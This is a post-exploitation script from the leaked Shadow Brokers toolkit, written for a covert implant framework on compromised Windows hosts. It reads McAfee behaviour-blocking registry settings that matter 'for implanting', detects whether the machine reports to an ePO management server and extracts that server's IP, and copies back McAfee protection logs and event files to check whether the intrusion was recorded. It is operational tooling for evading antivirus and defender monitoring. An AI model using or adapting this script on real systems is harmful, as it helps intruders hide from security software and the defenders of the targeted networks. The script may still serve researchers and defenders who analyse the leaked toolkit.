shadowbrokers-exploits/windows/Resources/Ep/Scripts/mcafee80.eps
2017-04-14 11:45:07 +02:00

163 lines
6.3 KiB
PostScript

#-------------------------------------------------------------------------------
# File: mcafee80.eps
# Description: Checks the status of McAfee Framework Services and logging
#
# v0.1 2006-11-22 Initial creation
# v0.2 2006-12-01 Added root drive discovery
# v0.3 2007-08-22 Modified to be called by mcafeestatus to support 8.5 additions
#-------------------------------------------------------------------------------
#string $root = GetEnv("_SYSDIRROOT");
string $system32 = GetEnv("SYSPATH");
string $rootDrive = split(":",$system32);
int $i = 0;
bool $check;
if( prompt "\rWould you like to pull McAfee's registry values?\rStrongly recommended on initial access.\r" )
{
@echo off;
@record on;
`regquery -hive L -subkey "software\\network associates\\tvd\\shared components\\on access scanner\\behaviourblocking"`;
@record off;
@echo on;
$i = 0;
string $reg_value;
string $reg_value_data;
string $status;
$reg_value = GetCmdData("value");
$reg_value_data = GetCmdData("value_data");
echo "Displaying registry settings we care about for implanting.\r";
while( $i < sizeof($reg_value) )
{
if ( $reg_value[$i] == "FileBlockEnabled_27" )
{
if( $reg_value_data[$i] == "00000000") { $status = "FALSE"; } else { $status = "TRUE"; }
echo "Prevent creation of new files in the Windows folder (.dll) = $status ($reg_value_data[$i])";
}
if ( $reg_value[$i] == "FileBlockEnabled_28" )
{
if( $reg_value_data[$i] == "00000000") { $status = "FALSE"; } else { $status = "TRUE"; }
echo "Prevent creation of new files in the Windows folder (.exe) = $status ($reg_value_data[$i])";
}
if ( $reg_value[$i] == "FileBlockEnabled_29" )
{
if( $reg_value_data[$i] == "00000000") { $status = "FALSE"; } else { $status = "TRUE"; }
echo "Prevent creation of new files in the System32 folder (.dll) = $status ($reg_value_data[$i])";
}
if ( $reg_value[$i] == "FileBlockEnabled_30" )
{
if( $reg_value_data[$i] == "00000000") { $status = "FALSE"; } else { $status = "TRUE"; }
echo "Prevent creation of new files in the System32 folder (.exe) = $status ($reg_value_data[$i])";
}
$i++;
}
echo "\rRegistry pull complete.\r";
}
echo "\rChecking to see if we are calling home to an ePO server...";
string $sslist = "$rootDrive[0]:\\Documents and Settings\\All Users\\Application Data\\Network Associates\\Common Framework\\ServerSiteList.xml";
string $smlist = "$rootDrive[0]:\\Documents and Settings\\All Users\\Application Data\\Network Associates\\Common Framework\\SiteMapList.xml";
@echo off;
@record on;
bool $ssl = `getfileattribs -file "$sslist"`;
bool $sml = `getfileattribs -file "$smlist"`;
@record off;
@echo on;
if ($ssl && $sml)
{
echo "\r***********\rServerSiteList.xml file exists\rLooks like we have an ePO server somewhere.\r***********\r";
if( prompt "Try to grep out the ePO Server IP?" ) { `grep -mask "$sslist" -pattern ServerIP`; }
if( prompt "Would you like to pull back the configuration file for inspection?" ) { `background copyget "$sslist"`; }
pause;
}else if ( $sml && ($ssl != true) ){
#Stand alone
echo "\rSiteMapList.xml = True\rServerSiteList.xml = False\rLooks like a stand alone install.\r";
}else if( ($ssl != true) && ($sml != true) ){
#Wrong path?
echo "\r***************\rCannot Verify Status!\rMost likely cause is the files are not in the default location.\rI checked:\r";
echo "$sslist";
echo "$smlist \r***************\r";
if (prompt "The rest of these checks will probably fail. Should I stop?") { return false; }
}else{
#Fresh agent install? Needs manual verification
echo "\r***********\rServerSiteList.xml file exists but SiteMapList.xml does not.\rLooks like we have an ePO server somewhere.\rThis may be a very recently installed box. PAY ATTENTION! NETWORK SECURITY MAY BE INCREASING!\r***********\r";
if( prompt "Try to grep out the ePO Server IP?" ) { `grep -mask "$sslist" -pattern ServerIP`; }
if( prompt "Would you like to pull back the configuration file for inspection?" ) { `background copyget "$sslist"`; }
pause;
}
echo "\rCurrent target time for reference is:";
@record on;
`remotelocaltime`;
@record off;
#Any chance we are in the logs?
string $aplog = "$rootDrive[0]:\\Documents and Settings\\All Users\\Application Data\\Network Associates\\VirusScan\\AccessProtectionLog.txt";
string $bolog = "$rootDrive[0]:\\Documents and Settings\\All Users\\Application Data\\Network Associates\\VirusScan\\BufferOverflowProtectionLog.txt";
@echo off;
echo "\r+++++++++++++++++++\rChecking out AccessProtectionLog\r+++++++++++++++++++\r";
@record on;
$check = `getfileattribs -file "$aplog"`;
@record off;
@echo on;
int $fsize;
string $mDate;
string $mTime;
if ($check)
{
$fsize = GetCmdData("Size");
$mDate = GetCmdData("ModifiedDate");
$mTime = GetCmdData("ModifiedTime");
echo "AccessProtectionLog details:\rLast modified on $mDate at $mTime \rFile size of $fsize bytes.\r";
if($fsize == 3){ echo "It appears the file is empty"; }
else { if( prompt "Would you like to copyget the file?" ) { `background copyget "$aplog"`; } }
}else{
echo "Sorry, I cannot find AccessProtectionLog in the default location. I looked in:\r\"$aplog\"\r";
}
@echo off;
echo "\r+++++++++++++++++++\rChecking out BufferOverflowProtectionLog\r+++++++++++++++++++\r";
@record on;
$check = `getfileattribs -file "$bolog"`;
@record off;
@echo on;
if ($check)
{
$fsize = GetCmdData("Size");
$mDate = GetCmdData("ModifiedDate");
$mTime = GetCmdData("ModifiedTime");
echo "BufferOverFlowProtectionLog details:\rLast modified on $mDate at $mTime \rFile size of $fsize bytes.\r";
if($fsize == 3){ echo "It appears the file is empty"; }
else { if( prompt "Would you like to copyget the file?" ) { `background copyget "$bolog"`; } }
}else{
echo "Sorry, I cannot find BufferOverflowProtectionLog in the default location. I looked in:\r\"$bolog\"\r";
}
pause;
echo "\r+++++++++++++++++++\rPreparing to list any .xml event files.\rIf you have been logged, you may see evidence of that here.\r+++++++++++++++++++\r";
echo "This listing has the potential to be very large.\rYou can always background it if it gets out of hand.";
pause;
`dir "$rootDrive[0]:\\Documents and Settings\\All Users\\Application Data\\Network Associates\\Common Framework\\AgentEvents\\*"`;